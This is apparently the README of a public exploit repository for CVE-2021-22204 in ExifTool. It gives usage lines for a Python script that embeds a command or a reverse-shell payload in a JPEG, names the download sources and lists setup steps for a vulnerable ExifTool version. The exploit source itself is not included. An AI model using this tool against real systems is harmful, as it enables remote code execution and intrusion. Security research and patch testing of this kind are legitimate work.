Like this repo? Give us a ⭐!
For educational and authorized security research purposes only.
@UNICORDev by (@NicPWNs and @Dev-Yeoj)
Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.
Use this exploit to generate a JPEG image payload that can be used with a vulnerable ExifTool version for code execution. A custom command can be provided or a reverse shell can be generated. A JPEG image is automatically generated, and optionally, a custom JPEG image can be supplied to have the payload inserted.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
Download exploit-CVE-2021-22204.py from GitHub
Download exploit-CVE-2021-22204.py from ExploitDB
searchsploit -u
searchsploit -m 50911
- python3
- djvulibre-bin
- exiftool
Exiftool Version 12.23
Exiftool Versions 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg